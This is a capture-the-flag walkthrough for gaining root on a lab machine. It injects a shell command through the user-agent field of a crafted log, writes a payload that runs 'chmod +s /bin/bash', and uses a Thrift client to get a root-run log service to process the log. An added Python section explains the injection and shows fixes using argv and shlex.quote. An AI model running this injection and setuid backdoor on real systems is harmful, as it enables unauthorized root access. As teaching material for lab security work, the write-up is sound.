Forward 9090 to your local machine

ssh -i id_ecdsa -L 9090:127.0.0.1:9090 [email protected]

Create the malicious log

Create this file at /tmp/malicious.log on the remote machine. The user-agent value is the injection: it is crafted to break out of a single-quoted shell argument, with the leading ' closing the quote, ; starting a new command, and the trailing # commenting out whatever the service appends after the value:

127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"

Create payload.sh

Create this file at /tmp/payload.sh on the remote machine (the injected command runs it through /bin/bash, so it does not need to be executable):

chmod +s /bin/bash
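
Why this payload works, and how the service could have avoided it. The following is an added Python example, not code from the original writeup or from the target. The target's server source is not on the page, so the `echo 'agent: ...'` template is an assumption standing in for whatever single-quoted shell command the service builds from the user-agent field. The log line is a constructed sample that keeps the page's `'; ... #` structure but runs a harmless echo instead of /tmp/payload.sh, so the demo is safe to run locally.

```python
import shlex
import subprocess

# Constructed sample log lines, in the shape of the page's /tmp/malicious.log.
# The malicious user-agent keeps the page's breakout structure  '; <cmd> #
# but swaps the command for a harmless echo.
MALICIOUS_LINE = '127.0.0.1 "user-agent":"\'; echo INJECTED #"'
BENIGN_LINE = '127.0.0.1 "user-agent":"Mozilla/5.0"'


def extract_user_agent(line: str) -> str:
    """Return the value of the "user-agent" field from one log line."""
    marker = '"user-agent":"'
    start = line.index(marker) + len(marker)
    end = line.rindex('"')
    return line[start:end]


def vulnerable_command(user_agent: str) -> str:
    # Hypothetical vulnerable pattern (assumption; the real server code is not
    # on the page): the field is interpolated into a single-quoted shell
    # argument and the whole string is later handed to a shell. With the page's
    # payload the leading ' closes the quote, ; ends the intended command, and
    # the trailing # comments out the ' that the template appends.
    return f"echo 'agent: {user_agent}'"


def run_vulnerable(line: str) -> str:
    """Build the command string and run it through /bin/sh (shell=True)."""
    cmd = vulnerable_command(extract_user_agent(line))
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened_argv(line: str) -> str:
    # Fix 1: no shell at all. The value is one argv element passed straight to
    # the program, so quotes and semicolons are just characters, never syntax.
    ua = extract_user_agent(line)
    return subprocess.run(["echo", f"agent: {ua}"],
                          capture_output=True, text=True).stdout


def run_hardened_quoted(line: str) -> str:
    # Fix 2: if a shell is unavoidable, quote the value with shlex.quote, which
    # wraps it in single quotes and turns each embedded ' into '"'"' so the
    # attacker-controlled text cannot terminate the string.
    ua = extract_user_agent(line)
    cmd = f"echo {shlex.quote('agent: ' + ua)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for label, fn in [("vulnerable", run_vulnerable),
                      ("hardened argv", run_hardened_argv),
                      ("hardened quoted", run_hardened_quoted)]:
        print(f"{label}: {fn(MALICIOUS_LINE)!r}")
```

Running it shows the vulnerable path executing the injected `echo INJECTED` as a second command, while both hardened paths print the user-agent back verbatim, quotes and all. Avoiding the shell entirely (fix 1) is the preferable change; quoting (fix 2) is a fallback when the command really must go through sh.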

Go back to your machine

Create a file named log_service.thrift with the following content:

namespace go log_service

service LogService {
    string ReadLogFile(1: string filePath)
}

After creating the thrift file, run this command to generate the Python client code (the namespace go line only affects Go output; with no py namespace, the Python package is named after the file, log_service, which is what the import in client.py below relies on):

thrift -r --gen py log_service.thrift

Then cd into gen-py and create client.py with the following content:

from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # Import generated Thrift client code

def main():
    # Connect to the forwarded port; the ssh -L tunnel carries it to the target's 9090
    transport = TSocket.TSocket('localhost', 9090)

    # Buffering for performance
    transport = TTransport.TBufferedTransport(transport)

    # Using a binary protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)

    # Create a client to use the service
    client = LogService.Client(protocol)

    # Open the connection
    transport.open()

    try:
        # Path of the crafted log on the remote machine (not a local path)
        log_file_path = "/tmp/malicious.log"

        # Call the remote method ReadLogFile; the server processes the file
        # and runs the injected command while doing so
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)

    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")

    finally:
        # Close the transport even if the call failed
        transport.close()

if __name__ == '__main__':
    main()

Install the required dependencies:

pip3 install thrift

Run the client:

python3 client.py

Get the flag

After running the client, /bin/bash on the remote machine is setuid root (verify with ls -l /bin/bash, which should now show rws in the owner permissions; this works because the service itself runs as root). Execute /bin/bash -p to get a root shell (the -p flag tells bash to keep the effective UID instead of dropping privileges), then cat /root/root.txt to get the flag.

Pub: 14 Sep 2024 23:15 UTC
Update: 14 Sep 2024 23:20 UTC